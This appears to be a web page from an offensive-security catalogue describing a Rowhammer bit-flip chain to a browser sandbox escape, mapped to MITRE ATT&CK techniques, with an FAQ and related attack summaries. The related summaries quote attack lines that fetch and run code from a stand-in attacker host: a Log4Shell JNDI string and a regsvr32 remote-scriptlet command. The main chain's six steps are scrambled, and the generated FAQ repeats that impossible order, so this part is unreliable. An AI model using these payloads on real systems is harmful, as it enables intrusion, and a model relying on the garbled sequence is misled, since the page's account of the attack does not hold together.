Rowhammer → bit flip → in-browser sandbox escape

§ Context

Assumed environment: target client device has DRAM susceptible to Rowhammer (most pre-2020 DDR4 in laptops / desktops). No DRAM ECC, no in-browser Rowhammer mitigations active.

§ Steps

1. 01
   Sandbox escape → arbitrary native codeInitial Access

   T1190— Exploit Public-Facing Application
2. 02
   Acquire read/write primitive in browserExecution

   T1059— Command and Scripting Interpreter
3. 03
   Drop local implantPersistence

   T1547— Boot or Logon Autostart Execution
4. 04
   Phish / drive-by to attacker pageInitial Access

   T1566— Phishing
5. 05
   Achieve targeted bit flip in PTEPrivilege Escalation

   HW-ROWHAMMER— Rowhammer Bit Flip
6. 06
   Hammer adjacent DRAM rows from JSPrivilege Escalation

   HW-ROWHAMMER— Rowhammer Bit Flip

§ References

• T1190Exploit Public-Facing Application
• T1059Command and Scripting Interpreter
• T1547Boot or Logon Autostart Execution
• T1566Phishing

§ Frequently asked

What is the "Rowhammer → bit flip → in-browser sandbox escape" attack path?

JavaScript hammers adjacent DRAM rows for tens of seconds; an unlucky-for-defender bit flip in a page-table entry hands the attacker a write primitive into another mapping. RIDL-class chain to native code. It chains 6 steps drawn from real-world offensive-security techniques.

What starting position does this attack require?

The first step is Sandbox escape → arbitrary native code (T1190) — a initial access primitive. Assumed environment: target client device has DRAM susceptible to Rowhammer (most pre-2020 DDR4 in laptops / desktops).

What is the final impact of this kill-chain?

The final step lands on Hammer adjacent DRAM rows from JS (HW-ROWHAMMER), which falls under Privilege Escalation. From here, an operator typically pivots into post-exploitation or maintains persistence.

How can defenders detect or prevent this attack?

Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.

§ Related dossiers

• Shared techniques3

  V8 type-confusion 1-day → renderer RCE

  Public V8 type-confusion turned into a renderer pop. JS triggers JIT into mis-compiling a polymorphic site, addrof/fakeobj primitives, shellcode in a WASM RWX page.

• Shared techniques2

  Log4Shell (CVE-2021-44228) → RCE → lateral

  Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.

• Shared techniques2

  Squiblydoo: regsvr32 → remote SCT execution

  regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll. AppLocker / SRP often allow regsvr32 because it's signed Microsoft — attacker JS runs in its context.

• Shared techniques2

  OneNote .one attachment → embedded payload → C2

  OneNote .one file with a friendly 'Double-click to view' overlay hides an embedded HTA / VBS / EXE. Effective initial access vector after Microsoft blocked internet macros in 2022.

• Shared techniques2

  Compromised vendor mailbox → reply-chain phishing → client compromise

  Take over a vendor / partner mailbox via AITM phishing. Reply to an existing thread with a malicious link — trust transferred from the genuine prior conversation defeats most user training.

• Shared techniques2

  Gatekeeper bypass → unsigned binary execution

  Deliver a payload that strips the com.apple.quarantine xattr (via .dmg with no quarantine attribute or an archive format that doesn't preserve xattrs) — Gatekeeper never prompts.